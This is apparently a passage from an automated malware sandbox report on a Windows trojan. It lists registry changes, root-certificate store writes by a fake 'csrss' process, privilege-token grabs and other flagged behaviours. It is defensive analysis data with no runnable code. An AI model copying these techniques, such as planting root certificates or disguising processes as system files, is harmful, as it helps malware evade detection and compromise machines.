Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Runs net.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\D5D.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\K.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\C135.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
